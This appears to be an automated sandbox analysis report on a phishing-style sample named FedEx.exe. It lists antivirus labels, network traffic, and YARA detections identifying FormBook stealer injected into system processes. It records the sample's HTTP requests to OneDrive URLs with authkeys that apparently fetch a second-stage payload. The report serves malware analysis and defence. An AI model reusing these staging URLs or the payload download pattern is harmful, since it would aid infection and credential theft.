          Source: 12.3.Rvsuben.exe.39ea7d8.40.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38c8b5c.421.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a28b5c.424.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.3a43d14.453.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39facf8.473.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ef1b0.184.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38bd068.578.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f05cc.101.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3892a94.261.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a59670.425.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a0f930.366.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39e4ab4.36.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39f4008.246.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39fe82c.575.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a17c04.507.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39efc30.218.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38b6f8c.480.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3897ff0.166.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38c2634.330.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39eff28.230.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.38bdb94.553.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a1551c.458.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39ebe14.142.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39ec008.161.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.388fb8c.88.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.389f508.198.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.389f4f0.195.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3893f68.288.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39ff848.217.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3894708.310.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 14.3.Rvsuben.exe.39fe710.123.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.3.FedEx.exe.3884030.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.39f7eb4.395.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 12.3.Rvsuben.exe.3a10008.412.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: FedEx.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.5:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.5:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49783 version: TLS 1.2
          Source: Binary string: WWAHost.pdb source: logagent.exe, 00000008.00000002.624050662.0000000005070000.00000040.10000000.00040000.00000000.sdmp, logagent.exe, 00000008.00000003.619739649.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.618801358.0000000005078000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: logagent.exe, 00000008.00000002.624050662.0000000005070000.00000040.10000000.00040000.00000000.sdmp, logagent.exe, 00000008.00000003.619739649.00000000054CB000.00000004.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.618801358.0000000005078000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: logagent.exe, 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.482099015.0000000004FFD000.00000004.00000800.00020000.00000000.sdmp, logagent.exe, 00000008.00000003.480246797.0000000004E62000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: logagent.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: FedEx.exe, 00000000.00000003.445278121.000000000096F000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431052122.0000000000978000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.429028276.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431052122.0000000000978000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/
          Source: FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/7
          Source: FedEx.exe, 00000000.00000003.445278121.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/9
          Source: FedEx.exe, 00000000.00000003.445278121.000000000096F000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431052122.0000000000978000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/C
          Source: FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/D
          Source: FedEx.exe, 00000000.00000003.429089058.0000000000976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/y#
          Source: FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.429028276.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/y4mTnkLj40hyLVw4BtBaiXNAdGj9lmXPu8bnFu8Q62yCKBLlljWV9gQTwNCXadDaPBG
          Source: FedEx.exe, 00000000.00000003.445278121.000000000096F000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431008651.0000000000972000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.431052122.0000000000978000.00000004.00000020.00020000.00000000.sdmp, FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/y4mbREn9_V4vP2iayGOc8Ug-MJsNGUbQ22edGkOo763CxJa0LiZHDGiyIHL8PMA6_CP
          Source: FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://7psoug.db.files.1drv.com/y4ml7-AIKSVvhdNF4oTlWE27Sg2xfN1VXI-zQgD_S8pdj84xCMmYdG5QewqUmSM7ppL
          Source: FedEx.exe, 00000000.00000003.432988112.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_
          Source: unknownDNS traffic detected: queries for: onedrive.live.com
          Source: global trafficHTTP traffic detected: GET /download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_G1rJPDU4 HTTP/1.1User-Agent: lValiHost: onedrive.live.com
          Source: global trafficHTTP traffic detected: GET /y4mTnkLj40hyLVw4BtBaiXNAdGj9lmXPu8bnFu8Q62yCKBLlljWV9gQTwNCXadDaPBG7a5xsZQK5iQFq0oL78Muh1zAhj_-GEEmciX2xawq2j1_yCdrDwIN59eRGDziNd9B4VLik6wClT-AZqKljLWZnWxQ35HpD4NNz2-X026MmD9jZr5dj0h083QXOKwfNDAijB2b6l19b29hHg3LxktPSA/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1 HTTP/1.1User-Agent: lValiHost: 7psoug.db.files.1drv.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_G1rJPDU4 HTTP/1.1User-Agent: 44Host: onedrive.live.comCache-Control: no-cacheCookie: E=P:c2oI1fM02og=:k6u1A444aq3bmDmo/mWTSqLlr2uZ2puo/iD5RFPbsfE=:F; xid=09282da4-e147-4895-8781-e47f9fbefcca&&RD00155D3F4236&173; xidseq=1; wla42=
          Source: global trafficHTTP traffic detected: GET /y4ml7-AIKSVvhdNF4oTlWE27Sg2xfN1VXI-zQgD_S8pdj84xCMmYdG5QewqUmSM7ppL4ErfY5FQN7yQ5e8Er7wNoethZZPpye0v7-OBK4AhUUqHfyyPL2MArqnagRFrgHcjasodUbnSfipUTgA205VKAkM6jdwj-Gik53gySQuJl4UaH9ZZ7bt5lPVcB0d0zfIP24kcbexngfNA4ODS-TihkA/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1 HTTP/1.1User-Agent: 44Cache-Control: no-cacheHost: 7psoug.db.files.1drv.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_G1rJPDU4 HTTP/1.1User-Agent: lValiHost: onedrive.live.comCookie: wla42=
          Source: global trafficHTTP traffic detected: GET /y4mXzMyFpM-jvgYM2atIhPeCTn-KOLCtL7U4aJYB1KsLhYlFeUNNY5EZ0sSApCOscVc-to_baaLv-1uq-cP7hO418R6MOZIGvLjtvhiD_mEDnWjp3s9Qsm1jpUq4454e-9uDhTZlrnoLq2DLbIyxL0XkGdDoZeoeSpDv4t2v7vZ0zKXXy9SWLxTnkTTK7PFcdWjAgGOV3jjYEd6kSox2c2hfQ/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1 HTTP/1.1User-Agent: lValiHost: 7psoug.db.files.1drv.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download??cid=020C1D97A63B8AD4&resid=20C1D97A63B8AD4%21155&authkey=ADj7CX_G1rJPDU4 HTTP/1.1User-Agent: 45Host: onedrive.live.comCache-Control: no-cacheCookie: wla42=; E=P:x8sx6vM02og=:Xai/HAzACW+7FNKbBAsKrPAl9FCAAVV5cLK8hqZn0bE=:F; xid=5c4918a1-6b9b-426b-b5a3-a1e2c0aa1d36&&RD00155D3F4235&173; xidseq=1
          Source: global trafficHTTP traffic detected: GET /y4mdlIsJv5Tl5tDvsMQlusKvl6KHLsIPGYjnDT92Ql0Z4RhT6d4YPOSq5oomATg0RWW04TBLjz9Th0GACCDR4MzUTy0Ib7dIUdXpmrwe7bOGx16nNEe5ZEFdAP0aKSAUbEEKdbUCA4qN9WtiA-RMypGqztNXcMBU_T1NHqmaPWhQkceP-sLizDEyr8dT8Qb0BFnniFZNQl2dlaqlWlEi2TPyw/Rvsubentohcvaxlbphydsofhyldatal?download&psid=1 HTTP/1.1User-Agent: 45Cache-Control: no-cacheHost: 7psoug.db.files.1drv.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.5:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.5:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49783 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
